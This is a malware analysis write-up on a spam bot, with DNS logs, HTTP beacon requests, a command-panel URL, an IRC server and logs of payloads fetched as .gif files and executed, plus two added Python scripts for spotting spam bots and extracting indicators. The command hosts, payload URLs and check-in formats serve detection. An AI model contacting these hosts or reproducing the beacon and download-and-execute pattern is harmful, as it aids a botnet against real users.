This malware spreads through email and by infecting .exe files. It injects into explorer.exe, downloads additional malware and is controlled over HTTP.
sec.ka3ek2.com DNS_TYPE_A 31.44.184.232
SMTP servers resolved by this malware for spamming (it looks up the MX records of the recipient domains and then the A records of the mail exchangers; these are the recipients' mail servers, not infected hosts):
Resolved : [mx3.hotmail.com] To [65.54.188.72]
Resolved : [mx3.hotmail.com] To [65.54.188.94]
Resolved : [mx3.hotmail.com] To [65.55.92.152]
Resolved : [mx3.hotmail.com] To [65.55.37.120]
Resolved : [mx3.hotmail.com] To [65.55.37.104]
Resolved : [mx3.hotmail.com] To [65.55.37.72]
Resolved : [mx3.hotmail.com] To [65.55.92.136]
Resolved : [mx3.hotmail.com] To [65.55.92.184]
Resolved : [mx3.hotmail.com] To [65.55.92.168]
Resolved : [mx3.hotmail.com] To [65.54.188.126]
Resolved : [mx3.hotmail.com] To [65.54.188.110]
Resolved : [mx3.hotmail.com] To [65.55.37.88]
exchange.quadranet.com DNS_TYPE_A 204.152.204.122
peercore.com.au DNS_TYPE_MX postoffice.telstra.net filter1.peerco-1.mailguard.com.au filter2.peerco-1.mailguard.com.au filter3.peerco-1.mailguard.com.au YES udp
purplecoral.com DNS_TYPE_MX aspmx4.googlemail.com aspmx5.googlemail.com aspmx.l.google.com alt1.aspmx.l.google.com alt2.aspmx.l.google.com aspmx2.googlemail.com aspmx3.googlemail.com YES udp
postoffice.telstra.net DNS_TYPE_A 203.50.2.115 203.50.40.137 203.50.90.137 YES udp
yahoo.com DNS_TYPE_MX mta7.am0.yahoodns.net mta5.am0.yahoodns.net mta6.am0.yahoodns.net YES udp
mta7.am0.yahoodns.net DNS_TYPE_A 209.191.88.254 66.94.236.34 66.94.237.64 66.94.237.139 67.195.168.230 74.6.136.65 74.6.136.244 98.139.175.225 YES udp
sbcglobal.net DNS_TYPE_MX sbcmx2.prodigy.net sbcmx3.prodigy.net sbcmx4.prodigy.net sbcmx5.prodigy.net sbcmx6.prodigy.net sbcmx7.prodigy.net sbcmx8.prodigy.net sbcmx9.prodigy.net sbcmx1.prodigy.net YES udp
ASPMX4.GOOGLEMAIL.com DNS_TYPE_A 209.85.229.27 YES
sbcmx2.prodigy.net DNS_TYPE_A 207.115.20.21 YES udp
gmail.com DNS_TYPE_MX gmail-smtp-in.l.google.com alt1.gmail-smtp-in.l.google.com alt2.gmail-smtp-in.l.google.com alt3.gmail-smtp-in.l.google.com alt4.gmail-smtp-in.l.google.com YES udp
gmail-smtp-in.l.google.com DNS_TYPE_A 74.125.127.26 YES udp
us.army.mil DNS_TYPE_MX mx.dr1.us.army.mil mx.ps1.us.army.mil mx.us.army.mil YES udp
forscom.army.mil DNS_TYPE_MX mx.conus.army.mil YES udp
mx.dr1.us.army.mil DNS_TYPE_A 143.69.243.34 YES udp
yahoo.co.in DNS_TYPE_MX mx-apac.mail.gm0.yahoodns.net YES udp
mx.conus.army.mil DNS_TYPE_A 143.85.192.16 143.85.199.16 YES udp
mx-apac.mail.gm0.yahoodns.net DNS_TYPE_A 106.10.166.54 106.10.166.52 YES udp
hotmail.com DNS_TYPE_MX mx2.hotmail.com mx3.hotmail.com mx4.hotmail.com mx1.hotmail.com YES udp
mx2.hotmail.com DNS_TYPE_A 65.55.37.104 65.55.37.120 65.55.92.136 65.55.92.152 65.55.92.168 65.55.92.184 65.54.188.72 65.54.188.94 65.54.188.110 65.54.188.126 65.55.37.72 65.55.37.88 YES udp
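The DNS log above is the fingerprint of a spam module: an ordinary workstation almost never asks for MX records, while this bot resolves the MX for every recipient domain and then connects to those exchangers on port 25 itself. The following script is an added example (not part of the original write-up or the malware) that flags clients with an unusual MX lookup fan-out from log lines in the same shape as the sandbox output on the page; the leading client column ("host1") and the alert threshold are assumptions added so that several machines can be compared.

```python
"""Flag hosts that resolve MX records for many distinct mail domains.

Added example, not part of the original write-up. The log lines are constructed
in the same shape as the sandbox output on the page, with an assumed client
column in front so that several machines can be compared.
"""
from collections import defaultdict
import re

# Constructed sample: "<client> <qname> <qtype> <answers...>" (client column is an assumption)
SAMPLE_DNS_LOG = """\
host1 gmail.com DNS_TYPE_MX gmail-smtp-in.l.google.com alt1.gmail-smtp-in.l.google.com YES udp
host1 hotmail.com DNS_TYPE_MX mx2.hotmail.com mx3.hotmail.com mx4.hotmail.com mx1.hotmail.com YES udp
host1 yahoo.com DNS_TYPE_MX mta7.am0.yahoodns.net mta5.am0.yahoodns.net YES udp
host1 sbcglobal.net DNS_TYPE_MX sbcmx2.prodigy.net sbcmx3.prodigy.net YES udp
host1 us.army.mil DNS_TYPE_MX mx.dr1.us.army.mil mx.ps1.us.army.mil mx.us.army.mil YES udp
host1 mx2.hotmail.com DNS_TYPE_A 65.55.37.104 65.55.37.120 YES udp
host1 sec.ka3ek2.com DNS_TYPE_A 31.44.184.232
host2 www.example.com DNS_TYPE_A 93.184.216.34 YES udp
host2 example.org DNS_TYPE_MX mail.example.org YES udp
host3 exchange.quadranet.com DNS_TYPE_A 204.152.204.122
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(DNS_TYPE_[A-Z]+)\s*(.*)$")


def parse_dns_log(text):
    """Yield (client, qname, qtype, [answers]) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        client, qname, qtype, rest = m.groups()
        # Drop the sandbox's trailing status/transport columns ("YES udp")
        answers = [a for a in rest.split() if a not in ("YES", "udp", "tcp")]
        yield client, qname.lower(), qtype, answers


def mx_fanout(text):
    """Per client: the set of distinct domains it requested MX records for."""
    fanout = defaultdict(set)
    for client, qname, qtype, _ in parse_dns_log(text):
        if qtype == "DNS_TYPE_MX":
            fanout[client].add(qname)
    return fanout


def suspected_spambots(text, threshold=3):
    """Clients that resolved MX records for at least `threshold` distinct domains.

    The threshold is a tuning assumption. A real mail server legitimately does
    this, so exclude known MTAs from the input before alerting.
    """
    return sorted(c for c, domains in mx_fanout(text).items() if len(domains) >= threshold)


def mail_exchangers_contacted(text, client):
    """Mail-exchanger hostnames the client learned from MX answers.

    These, not the queried domains, are the hosts it will connect to on tcp/25,
    so they are the right place to look for the spam connections.
    """
    mxs = set()
    for c, _, qtype, answers in parse_dns_log(text):
        if c == client and qtype == "DNS_TYPE_MX":
            mxs.update(answers)
    return sorted(mxs)


if __name__ == "__main__":
    for bot in suspected_spambots(SAMPLE_DNS_LOG):
        print(bot, "resolved MX for", sorted(mx_fanout(SAMPLE_DNS_LOG)[bot]))
        print("  will deliver to:", mail_exchangers_contacted(SAMPLE_DNS_LOG, bot))
```

On a network where outbound port 25 is only allowed from the mail gateway, the same fan-out check can be paired with a firewall rule: a workstation that resolves MX records and then tries tcp/25 to the answers is almost certainly running a spam bot.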
HTTP Conversations:
31.44.184.232:80 – [31.44.184.232]
Request: GET /spm/s_get_host.php?ver=565
Response: 200 “OK”
31.44.184.232:80 – [31.44.184.232]
Request: GET /spm/s_alive.php?id=56512448467253483541955089044298&tick=431640&ver=565&smtp=ok&sl=1&fw=0&pn=0&psr=0
Response: 200 “OK”
31.44.184.232:80 – [31.44.184.232]
Request: GET /spm/s_task.php?id=56512448467253483541955089044298&tid=45951
Response: 200 “OK”
Panel:
http://sec.ka3ek2.com/spm/
IRC:
60.190.218.97:5101
PRIVMSG #US! :[d="http://img105.herosh.com/2012/02/12/798090902.gif" s="34304 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" – Download retries: 0
PRIVMSG #US! :[d="http://img105.herosh.com/2012/02/12/215475701.gif" s="22528 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\2.tmp" – Download retries: 0
PRIVMSG #US! :[d="http://img105.herosh.com/2011/11/11/901707294.gif" s="65536 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\4.tmp" – Download retries: 0
PRIVMSG #US! :[d="http://img102.herosh.com/2012/02/17/487386428.gif" s="171088 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\3.tmp" – Download retries: 0
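Two kinds of C2 message appear on this page: the HTTP check-in (s_get_host.php, s_alive.php and s_task.php under /spm/, carrying the bot id, version, tick and SMTP status) and the IRC PRIVMSG lines in which the bot reports each payload it fetched (served with a .gif name from an image host) and executed. The script below is an added example, not part of the original write-up or the malware, that parses both and collects the indicators a blocklist would need. The request-log shape ("<src> GET <host> <path>") and the dictionary layout of the results are assumptions; the sample lines are constructed from the page's own entries.

```python
"""Extract indicators from the HTTP beacon and IRC bot reports shown above.

Added example, not from the original write-up. The request-log line shape and
the output dictionary layout are assumptions; sample lines are constructed from
the page's own HTTP requests and IRC messages.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed samples: three beacons, one benign request, two IRC payload reports.
SAMPLE_LINES = [
    "10.0.0.5 GET sec.ka3ek2.com /spm/s_get_host.php?ver=565",
    "10.0.0.5 GET 31.44.184.232 /spm/s_alive.php?id=56512448467253483541955089044298"
    "&tick=431640&ver=565&smtp=ok&sl=1&fw=0&pn=0&psr=0",
    "10.0.0.5 GET 31.44.184.232 /spm/s_task.php?id=56512448467253483541955089044298&tid=45951",
    "10.0.0.5 GET www.example.com /index.html",
    'PRIVMSG #US! :[d="http://img105.herosh.com/2012/02/12/798090902.gif" s="34304 bytes"] '
    'Executed file "C:\\Documents and Settings\\UserName\\Application Data\\1.tmp" - Download retries: 0',
    'PRIVMSG #US! :[d="http://img102.herosh.com/2012/02/17/487386428.gif" s="171088 bytes"] '
    'Executed file "C:\\Documents and Settings\\UserName\\Application Data\\3.tmp" - Download retries: 0',
]

# The three check-in scripts seen on the page and the query keys each carried.
BEACON_SCRIPTS = {
    "s_get_host.php": {"ver"},
    "s_alive.php": {"id", "tick", "ver", "smtp", "sl", "fw", "pn", "psr"},
    "s_task.php": {"id", "tid"},
}

HTTP_RE = re.compile(r"^(\S+)\s+GET\s+(\S+)\s+(/\S*)$")
IRC_RE = re.compile(
    r'PRIVMSG\s+(\S+)\s+:\[d="(?P<url>[^"]+)"\s+s="(?P<size>\d+) bytes"\]\s+'
    r'Executed file "(?P<path>[^"]+)"\s+[-\u2013]\s+Download retries:\s*(?P<retries>\d+)'
)


def parse_beacon(line):
    """Return a dict describing an /spm/ check-in, or None if the line is not one."""
    m = HTTP_RE.match(line)
    if not m:
        return None
    src, host, target = m.groups()
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if not parts.path.startswith("/spm/") or script not in BEACON_SCRIPTS:
        return None
    qs = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {
        "type": "beacon", "src": src, "c2": host, "script": script,
        "bot_id": qs.get("id"), "ver": qs.get("ver"), "task_id": qs.get("tid"),
        "smtp_ok": qs.get("smtp") == "ok",
        # The parameter set is part of the fingerprint; a key outside it hints at a different build
        "unexpected_params": sorted(set(qs) - BEACON_SCRIPTS[script]),
    }


def parse_irc_report(line):
    """Return a dict for a bot's 'Executed file' PRIVMSG, or None."""
    m = IRC_RE.search(line)
    if not m:
        return None
    url = m.group("url")
    return {
        "type": "dropped_payload", "channel": m.group(1), "url": url,
        "host": urlsplit(url).hostname, "size": int(m.group("size")),
        "path": m.group("path"), "retries": int(m.group("retries")),
        # Fetched as .gif but executed: the extension is camouflage, not the file type
        "masquerading": url.lower().endswith((".gif", ".jpg", ".png")),
    }


def extract_iocs(lines):
    """Run both parsers and collect the network indicators worth blocking or hunting for."""
    events = [e for l in lines for e in (parse_beacon(l), parse_irc_report(l)) if e]
    c2 = sorted({e["c2"] for e in events if e["type"] == "beacon"})
    payload_hosts = sorted({e["host"] for e in events if e["type"] == "dropped_payload"})
    bot_ids = sorted({e["bot_id"] for e in events if e.get("bot_id")})
    return {"events": events, "c2_hosts": c2, "payload_hosts": payload_hosts, "bot_ids": bot_ids}


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_LINES)
    print("C2 hosts:", iocs["c2_hosts"])
    print("payload hosts:", iocs["payload_hosts"])
    for event in iocs["events"]:
        print(event)
```

The bot id in s_alive.php and s_task.php is stable across requests, so it is a handy key for counting infected machines behind one egress address, and the "s=... bytes" sizes in the IRC reports give you something to match against files recovered from the Application Data directory even before hashes are available.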
Hosting info:
http://whois.domaintools.com/31.44.184.232